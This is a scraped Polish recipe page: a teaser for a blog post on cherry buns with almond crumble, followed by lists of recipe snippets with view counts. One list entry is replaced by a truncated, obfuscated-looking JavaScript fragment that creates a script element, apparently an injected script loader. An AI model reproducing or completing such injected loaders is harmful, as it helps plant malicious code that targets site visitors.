Bułki z wiśniami i migdałową kruszonką
Źródło: https://www.pelnytalerz.com/2014/08/buki-z-wisniami-i-migdaowa-kruszonka.html
Bułki z wiśniami i migdałową kruszonkąOstatnio rzadko się tu pojawiam, ale rozumiecie. Sezon wakacyjny. Siedzę właśnie w lesie nad jeziorem, a w zasadzie nad jeziorami. Kiedyś uciekaliśmy tu z Trójmiasta, zachwycając się spokojem, ciszą i brakiem zasięgu w telefonie ;) Jednak z roku na rok wszystko zaczęło się zmieniać. Okazało się, że w tym roku jest tu nawet kawałek...
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 12
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 16
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 14
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 17
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 9
Buraki to jedne z najbardziej wartościowych warzyw w... ⇖ 15
Przepisy z bloga
Dzień dobry! Pod koniec sezonu jagodowego wpadam tu z... ⇖ 560
Witajcie! Mam coś pysznego. Minijagodzianki z foremki na... ⇖ 540
Dzień dobry! Dzisiaj kulinarnie zapraszam do Grecji, a... ⇖ 571
Dzień dobry!W ramach świątecznych przygotowań mam dla... ⇖ 618
W tym roku zdecydowanie nie mam ochoty na świąteczne... ⇖ 764
Tyle lat blogowania i nie masz tam schabowego? Takie... ⇖ 1973
Przepis został zmodyfikowany 11.07.2020. Zmieniłam... ⇖ 419
Sezon na rabarbar się kończy, więc czas zabrać się za... ⇖ 394
Czy już pisałam, że uwielbiam truskawki? Na pewno tak.... ⇖ 335
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 343
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 254
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 200
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 160
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 154
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 144
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 66
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 60
Buraczki z czosnkiem i majonezem – prosty przepis na... ⇖ 56









































